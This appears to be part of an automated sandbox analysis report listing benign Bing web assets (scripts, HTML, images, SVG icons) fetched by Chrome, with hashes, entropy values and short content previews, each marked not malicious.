                                                                                                                                                                                                                                                                        Preview:#rewardsLoadingAnimation{position:absolute;top:50%;left:50%;margin-left:-30px;z-index:1;border-radius:50%;border:1.5px solid;border-color:#0078d4 #c7e0f4 #c7e0f4;animation:spin360Deg 1.3s cubic-bezier(.53,.21,.29,.67) infinite}#rewardsLoadingAnimation.extraLarge{width:100px;height:100px}#rewardsLoadingAnimation.large{width:80px;height:80px}#rewardsLoadingAnimation.medium{width:60px;height:60px}#rewardsLoadingAnimation.small{width:40px;height:40px}#rewardsLoadingAnimation.extraSmall{width:20px;height:20px}@keyframes spin360Deg{from{transform:rotate(0deg)}to{transform:rotate(360deg)}}
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):15738
                                                                                                                                                                                                                                                                        Entropy (8bit):7.962121211990795
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:e98CzS3KgO3CKxiMhdbyzfu/b6bi3dXokSDKMYn+EG6:e9vS3KgOnMMhVKfSObQ2kSDrY+ED
                                                                                                                                                                                                                                                                        MD5:668C3E51B7D9E01F7A9051AFE8D481C0
                                                                                                                                                                                                                                                                        SHA1:895F50430B6374D6451EDECE4FF88BDC3AEB042E
                                                                                                                                                                                                                                                                        SHA-256:80F8BD7F3A9ED8538B866158C16CC0A720C732DB548CDCE3B8062745DADBDC2D
                                                                                                                                                                                                                                                                        SHA-512:B85426B2B290F67C00E7962CEB166EF78C6C80C373ADF5756DCA56287D46B080CF7C73CE2FF74BD36F5125C5EE09ECAA512F6DEE41D64030BDE14927B18B5FA1
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://th.bing.com/th?id=ORMS.599abefe023233cabdd3486a4a86fd0b&pid=Wdp&w=300&h=225&qlt=90&c=1&rs=1
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....T...`CSQ.nk.........n...1V#p....`{P......8...~.WZym...FN3......kvZ[y..n^9../..}..Q...qq..c...|.t'....F.: .?6.nm.M........P....)...;...e.}e...).L....=.,.i.L.W.Y.2O.:..."...yk....z...E*...u..n[..;....V.w.............M.....O.k..4..."......Nm...Nk.<#.....S,2w...)..J\....m.....~.b.......f..o..c&c..t....yp7.&>.x.>..C..Y...P.H.n....+K.:..gg#A.SnY..?........
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3775), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):3775
                                                                                                                                                                                                                                                                        Entropy (8bit):5.29650692492817
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:HgGiPbuAlWy7sCHBFHEm0tWr3cJvEb6FG:HTMuAldsCHB4YrtgG
                                                                                                                                                                                                                                                                        MD5:25579D1CA23E689B3D4F7751209A1E74
                                                                                                                                                                                                                                                                        SHA1:E6F447A90A7A166E026714CFA55C7DC0D90673CD
                                                                                                                                                                                                                                                                        SHA-256:F08BD9586C19AF0E136ECE0231038F74BC3F705CC9C49CC593170A2979F8D26F
                                                                                                                                                                                                                                                                        SHA-512:39AF9657F5DBCA78717262B2F7A2BF841F7513D3E3240CFDB6EF74B948F98218A6886CEC9BC7E01A46BC2091E81EA7A8A85AA382A3BC410960B69808BFC25DFA
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://www.bing.com/sa/41714962/Blue/HamburgerServicesHeaderFlyout_c.js
                                                                                                                                                                                                                                                                        Preview:var sch=sch||{};(function(){function ct(){typeof sj_b!="undefined"&&r&&n&&(ft(),sj_be(r,u,et,!1))}function ft(){var r,u,i,t;l||(l=!0,r=[],at(r),r.push("IID="+n.getAttribute("_iid")),r.push("IG="+_G.IG),u=_w.Feedback,u&&u.Bootstrap&&r.push("fbnb=1"),i="/hamburger/scfo?ver="+_G.AppVer+"&"+r.join("&"),i.indexOf("&ru=")<0&&(i=i+"&ru="+encodeURIComponent(_w.location.href)),/^\/images\/search$/i.test(_w.location.pathname)?i+="&mmasync=1&src=img":/^\/images\/feed/i.test(_w.location.pathname)?i+="&mmasync=1&src=imgfd":_w._H&&(_w._H.feature==="cnt"?i+=_w._H.type==="entp"?"&src=ent":"&src=cnt":_w._H.hpqs&&(i+="&src=hp")),t=sj_gx(),t.open("GET",i,!0),t.onreadystatechange=function(){t.readyState==4&&t.status==200&&t.responseText?(_w.sj_appHTML?sj_appHTML(n,t.responseText):n.innerHTML=t.responseText,p=!0,lt(),w!=null&&et(w)):t.readyState==4&&(l=!1,p=!1)},t.send(null))}function lt(){var t,n,i;if(sj_evt.bind("onFeedbackStarting",b),sj_evt.bind("onMenuDismiss",b),_d.querySelectorAll)for(t=_d.querySele
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (61566), with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):126282
                                                                                                                                                                                                                                                                        Entropy (8bit):5.7035670074413884
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:Gv3e6ZhOiif1chbMp0XaZQTyv2t68h1SU/cN6UuD5EJ4Y3zts+WUNf12pqZ9aK4W:GfLZmf1chbg+ar2olU/eZoKpR34ZUr
                                                                                                                                                                                                                                                                        MD5:74EE3DA4A640A4676DB5C160B1B60DF0
                                                                                                                                                                                                                                                                        SHA1:95FA56C5FF19CCFD16C259F1C9B7B9554BECE56D
                                                                                                                                                                                                                                                                        SHA-256:B9B829B7A8866C2BFD37566E5B381B6D5296609F7807E1E9F570428EFFC3DD56
                                                                                                                                                                                                                                                                        SHA-512:04A81D29C81656AA9C104E2F1AC25AF31A9F4899DE405D4C0348CE28E76443976164261A96AD9F44E02CD4B017A6E361FEDEBDCA3FD3E5CC3A53A0A2A006D3FE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://www.bing.com/
                                                                                                                                                                                                                                                                        Preview:<!doctype html><html lang="en" dir="ltr"><head><meta name="theme-color" content="#4F4F4F" /><meta name="description" content="Bing helps you turn information into action, making it faster and easier to go from searching to doing." /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta property="fb:app_id" content="570810223073062" /><meta property="og:type" content="website" /><meta property="og:title" content="A global code for the future" /><meta property="og:image" content="https://www.bing.com/th?id=OHR.CERNCenter_EN-US9854867489_tmb.jpg&amp;rf=" /><meta property="og:image:width" content="1366" /><meta property="og:image:height" content="768" /><meta property="og:url" content="https://www.bing.com/?form=HPFBBK&amp;ssd=20231206_0800&amp;mkt=en-US" /><meta property="og:site_name" content="Bing" /><meta property="og:description" content="Computer science is a dynamically developing disci" /><title>Bing</ti
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):23471
                                                                                                                                                                                                                                                                        Entropy (8bit):7.966359359884777
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:eWItG6hWkFT/EmrwCXtLWUHWymJJhBtOvUb1hg/tLiY934aKTqVqvkfcUd3Zb/5k:exJx8mrXXt5LmJBtYUZhgFLi83g2lbdM
                                                                                                                                                                                                                                                                        MD5:04C56DD2B22F2C5CF19A6D53CCA6C76E
                                                                                                                                                                                                                                                                        SHA1:FF0E74702813EC206B64DF093A6EA1677726645F
                                                                                                                                                                                                                                                                        SHA-256:094775A794E227D1569FB612A94D2EC0C58CBF9C10B68BA8C782580FBADC525C
                                                                                                                                                                                                                                                                        SHA-512:D859E611EAF4ACEC6E8D898566DAE8C61CE3AF6324B35880898578525F09B1419983FE79A398A5C480DFE8CDF7D9D5F9D414A28DE02D23799991CEBBB9AD062B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..ks....+..n..&6.6.....n."..t..........W......3..U..gR;U.<b.|{U..M....8..Y7.....tH~......1.RqLjM.{7.1..G..I~.X..#..K.AL.T.!....L..u_........z..P......./u._G..kU.......+.._...`.SZ1.(.Q)V..|.q..Ho../.F.F..6a.I.T...q_Iyk.(1F..R.1.?.T.|.s...Lw.K..K.+P....>......../.L.<..ZN...&.s...:.....O".\|..$`.V..k..k....K.S......T.....S..../.....=X0?.W....b..&}..W.riv....L}
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (21819)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):21850
                                                                                                                                                                                                                                                                        Entropy (8bit):5.354090222291205
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:Kh4kT1lYxfiWahKMpWMEVhbTDDoFWZ3BnqIfP5IDV6s4RKAwKXvUNuw+0TVteAaV:Y5TifxbBpBnqIH+Z6sepXv0uAaV
                                                                                                                                                                                                                                                                        MD5:30280C218D3CAAF6B04EC8C6F906E190
                                                                                                                                                                                                                                                                        SHA1:653D368EFDD498CAF65677E1D54F03DD18B026B5
                                                                                                                                                                                                                                                                        SHA-256:D313C6FFF97701CC24DB9D84C8B0643CA7A82A01C0868517E6E543779985C46E
                                                                                                                                                                                                                                                                        SHA-512:1F329898FA0E68F65095B813CA20351ACFEAA5F74DB886508FD4F1FA85811A8CC683C6FAB9D9F094F596C8957219F8E29A6307EA0B2D470BDC809A4B9C9D34DC
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/ZT02jv3UmMr2Vnfh1U8D3RiwJrU.js
                                                                                                                                                                                                                                                                        Preview:/*!DisableJavascriptProfiler*/.var BM=BM||{};BM.config={B:{timeout:250,delay:750,maxUrlLength:300,sendlimit:20,maxPayloadSize:14e3},V:{distance:20},N:{maxUrlLength:300},E:{buffer:30,timeout:5e3,maxUrlLength:300},C:{distance:10}},function(n){function vt(){if(!document.querySelector||!document.querySelectorAll){k({FN:"init",S:"QuerySelector"});return}w={};e=[];ft=1;ut=0;rt=0;o=[];s=0;h=!1;var n=Math.floor(Math.random()*1e4).toString(36);t={P:{C:0,N:0,I:n,S:ei,M:r,T:0,K:r,F:0}};pi()}function oi(n,t){var r={};for(var i in n)i.indexOf("_")!==0&&(i in t&&(n[i]!==t[i]||i==="i")?(r[i]=t[i],n[i]=t[i]):r[i]=null);return r}function si(n){var i={};for(var t in n)n.hasOwnProperty(t)&&(i[t]=n[t]);return i}function b(n,t,r,u){if(!h){k({FN:"snapshot",S:n});return}r=r||ni;t=t||!1;var f=g()+r;ot(o,n)===-1&&o.push(n);t?(yt(),pt(t,u)):f>s&&(yt(),rt=sb_st(pt,r),s=f)}function k(n){var u={T:"CI.BoxModelError",FID:"CI",Name:ht,SV:ct,P:t&&"P"in t?d(t.P):r,TS:f(),ST:v},i,e;for(i in n)u[i]=n[i];e=d(u);wt(e)}func
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2737
                                                                                                                                                                                                                                                                        Entropy (8bit):5.143739593947487
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:TSEFkrgXL4vxyL9oG5e/LGlCbux1ZkCLtgQQ/TY740a3HOzw3B+THvRkqBHtoUqM:mrTeRkaAburmvlSxINwTqeW1MN
                                                                                                                                                                                                                                                                        MD5:8F824B93502AA4AA1CF9F8A77E6B7F10
                                                                                                                                                                                                                                                                        SHA1:7EE42795FD98366080A6D79A134F18CA84DDB064
                                                                                                                                                                                                                                                                        SHA-256:6CFE41748D6981393CFDB649AB1048EE0F08C1F2BAFAF7E5BECA030DD77EBC56
                                                                                                                                                                                                                                                                        SHA-512:CBB60A1DB15705AAB7BA4AC64F7AE960BD30317E301204C65A7ED0C5C7C10333120523D5E101A9874E8858FCCC7C5981AB996AB57708FDA09D578E8CFCCA77F1
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:<svg width="72" height="72" viewBox="0 0 72 72" fill="none" xmlns="http://www.w3.org/2000/svg">.<g filter="url(#filter0_f_2673_133239)">.<path d="M35.7195 13.5491C35.7195 7.72157 30.9337 2.9989 25.0317 2.9989C19.1296 2.9989 14.3439 7.72157 14.3439 13.5491V41.2798C11.0857 44.1804 9 48.3335 9 53.0008C9 61.7448 16.1813 68.8275 25.0317 68.8275C33.8848 68.8275 41.0634 61.7448 41.0634 53.0008C41.0634 48.3335 38.9776 44.1804 35.7195 41.2798V13.5491Z" fill="url(#paint0_linear_2673_133239)" fill-opacity="0.2"/>.</g>.<path d="M36.6355 13.5766C36.6355 7.73387 31.8498 2.9989 25.9477 2.9989C20.0456 2.9989 15.2599 7.73387 15.2599 13.5766V41.3795C12.0018 44.2877 9.91602 48.4516 9.91602 53.131C9.91602 61.8977 17.0973 68.9989 25.9477 68.9989C34.8008 68.9989 41.9794 61.8977 41.9794 53.131C41.9794 48.4516 39.8936 44.2877 36.6355 41.3795V13.5766Z" fill="url(#paint1_linear_2673_133239)"/>.<rect x="21.9398" y="9.99887" width="8.01584" height="27" rx="4.00792" fill="black" fill-opacity="0.2"/>.<path fill-rul
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1304
                                                                                                                                                                                                                                                                        Entropy (8bit):4.767968631693785
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:YogdqtOLxL1iKCSzSQxmdfpkZnEDoAQE:TjtOniKCSlmJpCncx
                                                                                                                                                                                                                                                                        MD5:671DDC2887FB01DFC418864231D503E0
                                                                                                                                                                                                                                                                        SHA1:C709A9F97B41095CD1A0436FDE285467AC460147
                                                                                                                                                                                                                                                                        SHA-256:E2D2752332894DBDC79D3690468FD5811B38A7AB1380AD788165F1458C9C1968
                                                                                                                                                                                                                                                                        SHA-512:D65ECB575D650443B0FACFC74ECD0B9173B38AA2D497DE066F13A5DF892899040FACFE293C055FB4667DACD0FAB904B85B7C06EFC4C455645254ECE1BDA8A59F
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBWdbbd.img?w=16&h=16&q=100&m=6&f=png&u=t
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................a....pHYs..........+.....NIDATx..SMkSA.=..%R....4..QP.XHM7fSL.@. ]....HQAD...A..;A.;EH......DE("...j..&mc.....Lx1../.;w.93w.^.-b%3.$.i.#...M..>3.x\..s..R'..`T...<.].=.f.8.t..h.&/9...&...k.....p% ]...`....@..<.....M`..[......b....K...&.W5.A..]3..vb....J)/h7.)].........-%|...s?14.%...i.z5a.|....@..h..u..f..8..g.=.[XBz1...P..J!....E..Z...O..t..#..>._...`..QWa..-..lG........&..C....7.\.Fzi..Q{E/P....=G.<.}+....j.W.......o".*....F.g....v.;..TZ.*l..B$.......w.b..r...2.?.a.,;.~..C..E.!..:x._.|..sn...R. ....%.....*.q'..&......|"......;.WU.......a3...>.7....<U..2M....'....v.S.Lp...........T)....IEND.B`.............................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1212
                                                                                                                                                                                                                                                                        Entropy (8bit):4.746571054177901
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:6v/7hJp8IkCuF6aDUSFPVKkT/qUn9WIlwKILyhFCHvjXabkJiwypN4:SpWLzp1A0wKILyhoHvrvXAN
                                                                                                                                                                                                                                                                        MD5:37CF855C1E1C773C05DFAE6D323C0978
                                                                                                                                                                                                                                                                        SHA1:FC2D73558B5A03C5CE0084BA0B70767A1773C728
                                                                                                                                                                                                                                                                        SHA-256:990A8A1556EEBE54E3730A3C84B390FD2DAD626CA7A54DA6A7F138F92527E9A8
                                                                                                                                                                                                                                                                        SHA-512:C02F5B70F5D1BA90DC14A8155DC2956D60297930E6E34F50295F6ACD84671FA2E78CDEFDD730B271916D49F8C1A49C69962030C84BB4BAB72714BFE328A66BFF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................a....pHYs..........+..... IDATx..SMHTQ.....y>..j...d..v.B.{!7.+.%..Q.j$....Em.D.VA....I....ZL.j.......9..<.aZu......}..s.~.JK..Y17. ....G@8.-..}.\.1:N.6`.....l....yR...,...hYp.{ .[.....(...D...|.g..4<.'...!.S......&`.?..7.c{&.a.P...}......c..... .....E..!q...kV..2.M..N..2.........X..P.s.v.9.G:P".c..1.".;..*..+&R..M..f." ..d..d_g.....~..:.7.....W..o. v.....O..........>.:.....'..a...H^.h^...";..Ab........QU.zb...4...3.U.0Z[.^....)..G.';......*...0;.q...N.y.0..y.F...Q.............C.X............kl..Pfm.?...n}.*..v.[..E.\..Q.........4@uYh... .....e)...._i..[r..?....IEND.B`...........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1477
                                                                                                                                                                                                                                                                        Entropy (8bit):5.147477666443474
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:t4I6nxZuFcLwLsLjpaABLNRERBLLR5RBLoRFkERBLh4HxpGydGPS5HxpGESGMcRD:knpLwLsLj3LN2TLLHTLoUETLuHaDPGHd
                                                                                                                                                                                                                                                                        MD5:411B26A34D3C7CAB1793600C7461D628
                                                                                                                                                                                                                                                                        SHA1:5F4D10834676335CB8FECBF4A6405BDFDB02B2B7
                                                                                                                                                                                                                                                                        SHA-256:EAB006435A852C9CBD409B53D14980A92DD072DCCC22316FC562528EB0C54000
                                                                                                                                                                                                                                                                        SHA-512:C1F73327871B9B80008D1E57291E1DD2B09068CB0564C597183DFD1EE58E7C2FF131DC3F9EA71A411A87142C1AB038B354C430137AAA90BF0D95A684C083BB41
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 16 16" width="14" height="16">..<path fill="#737A80" d="M1 1h14a4 4 0 01-4 4H5a4 4 0 01-4-4zM1 6h14a4 4 0 01-4 4H5a4 4 0 01-4-4zM1 11h14a4 4 0 01-4 4H5a4 4 0 01-4-4z"/>..<rect width="8" height="16" x="4" fill="url(#paint0_linear)" rx="1"/>..<circle cx="8" cy="3" r="2" fill="#FF4C00"/>..<circle cx="8" cy="3" r="2" fill="url(#paint1_linear)"/>..<circle cx="8" cy="8" r="2" fill="#FFB900"/>..<circle cx="8" cy="8" r="2" fill="url(#paint2_linear)"/>..<g>.. <circle cx="8" cy="13" r="2" fill="#78D30C"/>.. <circle cx="8" cy="13" r="2" fill="url(#paint3_linear)"/>..</g>..<defs>.. <linearGradient id="paint0_linear" x1="8" x2="8" y1="0" y2="16" gradientUnits="userSpaceOnUse">.. <stop stop-color="#5C6166"/>.. <stop offset="1" stop-color="#45494D"/>.. </linearGradient>.. <linearGradient id="paint1_linear" x1="9" x2="7" y1="4.732" y2="1.268" gradientUnits="userSpaceOnUse">.. <stop stop-color="#D83B01"/>.. <stop offset="
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):16805
                                                                                                                                                                                                                                                                        Entropy (8bit):7.96652595342381
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:eO78M4HdOWkPItioxSE8axWB9RznBYId/AzqNWpKtM6QHfK:eOhzIMoxSEd+9Y4/SqeK66p
                                                                                                                                                                                                                                                                        MD5:30085D1F40ACD483B2CA93C4EA164E53
                                                                                                                                                                                                                                                                        SHA1:DFD08585B733A0D719CDB83EED9C99BA3E787EF5
                                                                                                                                                                                                                                                                        SHA-256:36FCE38700B44FC77613A39F3DC54B7FFFA9A28B26517CF16B967968022F88D2
                                                                                                                                                                                                                                                                        SHA-512:8EECC9F98933D2EA51E42A165717E4E60359A977156D4E334EECAE615724DA32909C59B74D62F6A52638198E5094F0E1F8C5A782288BF18488C19AEA5494F28C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://th.bing.com/th?id=ORMS.090c5d5caf4002e5d0ddcd417aabfe70&pid=Wdp&w=300&h=225&qlt=90&c=1&rs=1
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....6p}q.&`3..b..'..Ozlj.A.Z....B........D..I..sRZ..Nq..vV,x..(}H.*[$}9...`u..U.bLc..V.A. g..[...6.D..``..Q.u.=.:2.j.<.....<.7d....._C.`...1W,[j..*..j....P.2O..?.Cx7.].;..jl...'4.W.q......b....p.e......9.[<t5...)....k...P...7..S...G..?.4..^.ZL..V.+....(..N:z{..V.vL.f.s.6...Q.A...]....x....(.{.e.s..e.S........[Sc.<..g.o..y.3.....4y...]..+d..?{.y.x..'.nk
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1829
                                                                                                                                                                                                                                                                        Entropy (8bit):3.958376074234918
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:tVvnjuDebkQ/KN8NUfgVNsukQyO/HOOF7ygEjzKzBF6RR2poIugpDco1EISiezGA:rnC2R/74gVNbWgUzKznSooILDpOHxh
                                                                                                                                                                                                                                                                        MD5:B006565D5EE6ED73849DDBC655EDEA32
                                                                                                                                                                                                                                                                        SHA1:3271C938DF715185E983EA682EFC9C7E870C58E0
                                                                                                                                                                                                                                                                        SHA-256:51F195E58525D32BFEC69FB435044246E340540C88CBBAC83501969EF638820E
                                                                                                                                                                                                                                                                        SHA-512:6D8126DA32DE2600693541C95A010BA5CB4B9A97401BC7EA335974DB451020677550A05D5379DD5670719B87CBC72B9E519F007769EF1AF1BD3D03C33900635C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://www.bing.com/rp/MnHJON9xUYXpg-poLvycfocMWOA.svg
                                                                                                                                                                                                                                                                        Preview:<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">. <path d="M13.5001 5.00088C14.8255 5.00088 15.91 6.03236 15.9947 7.33639L16 7.50075V13.5001C16 14.8255 14.9685 15.91 13.6645 15.9947L13.5001 16H7.50075C6.17534 16 5.09084 14.9685 5.0062 13.6645L5.00088 13.5001V7.50075C5.00088 6.17534 6.03236 5.09084 7.33639 5.0062L7.50075 5.00088H13.5001ZM13.5001 6.00083H7.50075C6.7211 6.00083 6.08038 6.59569 6.00769 7.3563L6.00083 7.50075V13.5001C6.00083 14.2798 6.59569 14.9205 7.3563 14.9932L7.50075 15.0001H13.5001C14.2798 15.0001 14.9205 14.4052 14.9932 13.6446L15.0001 13.5001V7.50075C15.0001 6.7211 14.4052 6.08038 13.6446 6.00769L13.5001 6.00083ZM10.5004 7.00078C10.7459 7.00078 10.95 7.17764 10.9924 7.41088L11.0004 7.50075L10.9994 10.0005L13.5005 10.0006C13.7766 10.0006 14.0004 10.2245 14.0004 10.5006C14.0004 10.746 13.8236 10.9502 13.5903 10.9925L13.5005 11.0006L10.9994 11.0004L11.0004 13.5005C11.0004 13.7766 10.7766 14.0004 10.5004 14.0004C10.255 14
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (19008)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):316988
                                                                                                                                                                                                                                                                        Entropy (8bit):5.239088634343518
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:vLKLj7yjWF276GNg9fpe3HdabIKSB1DkCXW8o0oMlppfbm:zgj7bSB1DkCXW8T5dbm
                                                                                                                                                                                                                                                                        MD5:8192D891E754AFD81A399F98BC6B265F
                                                                                                                                                                                                                                                                        SHA1:965E6C69F45118FEAB86EEEBBB0FC4964F2B3A98
                                                                                                                                                                                                                                                                        SHA-256:E2E4D97C20D4478E8E947480C8F6C71A2C795776D405366BE70DB82E4EA4BA77
                                                                                                                                                                                                                                                                        SHA-512:7C2712A1E34DA9062F50E7D93F4E74772044E45C265C682ABCD4E28E4004DCDAF6CE7479A4E8785986A88A32257E4FAC0ECF8CE23AFE47968C4510DF0A2C800B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:/*! @azure/msal-browser v2.28.2 2022-09-06 */."use strict";!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?t(exports):"function"==typeof define&&define.amd?define(["exports"],t):t((e="undefined"!=typeof globalThis?globalThis:e||self).msal={})}(this,(function(e){./*! *****************************************************************************. Copyright (c) Microsoft Corporation... Permission to use, copy, modify, and/or distribute this software for any. purpose with or without fee is hereby granted... THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH. REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY. AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,. INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM. LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR. OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (29136), with CRLF, LF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):48402
                                                                                                                                                                                                                                                                        Entropy (8bit):5.486987639846268
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:KkuL2ym/YIZE2u16tNz14nOIqVp1hO7JUDWvjygz+YIdQFSO4FWCPPZPzAT8SjF2:D3zhSjyJ1FWCpPwONifi
